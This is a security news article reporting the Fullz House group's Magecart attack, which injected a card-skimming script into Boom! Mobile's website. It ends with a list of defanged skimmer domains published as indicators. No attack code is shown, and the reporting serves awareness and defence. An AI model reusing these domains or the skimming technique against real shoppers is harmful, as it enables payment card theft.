Fullz House Hacker Group Hacked Mobile Provider to Steal Credit Card Data

The Fullz house hacker group has recently hacked mobile provider to steal credit cards and all its details. The hacker group has injected a credit card stealer script into the website to steal credit cards. 

The Boom! Mobile provides postpaid and prepaid no-contract wireless service plans to its consumers that enable them to implement the lines of the nation’s largest cellular networks that also include AT&T, T-Mobile, and Verizon.

According to the Malwarebytes report, this type of accommodation is known as a MageCart attack. The experts asserted that the attackers injected malicious JavaScript scripts within one or more segments of a compromised website. 

Later all these scripts are used by the hackers to steal payment or private data that are submitted by the sites’ clients within e-commerce orders.

Odd victim

The Boom! Mobile is the odd victim, as it’s a wireless supplier that trade mobile phone plans that influence on the big networks. However, the Oklahoma-based business advertises excellent customer service, transparency, and no contracts.

The Boom! Mobile affirmed that their crawlers have detected that their website, boom[.]us, had been infected with a one-liner that accommodates a Base64 encoded URL loading an external JavaScript library.

Fullz House Hacker group 

Apart from this, the Boom! Mobile has claimed that they had recognized this domain and code from a former incident where the attackers had used the decoy payment portals set up just like phishing pages.

Moreover, the RiskIQ also traced this group by giving the nickname “Fullz House” due to its practice of carding sites to resell. The “Fullz,” is a phrase that is used by criminals assigning to full data packages from sufferers.

Boom! Mobile has noticed a number of new domains that were enrolled and attending the same pattern in late September. However, this group was very powerful and productive too, and they continue on a well-established pattern that has been seen a year ago.

The security experts have reported regarding the incident both via live chat and email to the Boom! Mobile but, they have not got any message back from them at the time of signing. This implies that the website of Boom! Mobile is still compromised, and all the online shoppers are still at risk.

Skimmer domains

  • google-standard[.]com
  • bing-analytics[.]com
  • google-money[.]com
  • google-sale[.]com
  • paypal-assist[.]com
  • paypal-debit[.]com
  • connect-facebook[.]com
  • cdn-jquery[.]com
  • google-assistant[.]com
  • paypalapiobjects[.]com
  • google-tasks[.]com
  • jquery-insert[.]com
  • googleapimanager[.]com

The threat actors group under the Magecart umbrella proceed to target and steal payment card data with their so-called software skimmers. However, the security researchers have observed all the movements of the groups at least since 2010.

It means that the Boom! Mobile is not the only target; the threat actors have many more targets. In one of the joint records, many groups are quite advanced than others, especially; the gang traced as Group 4 seems to be very complicated.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.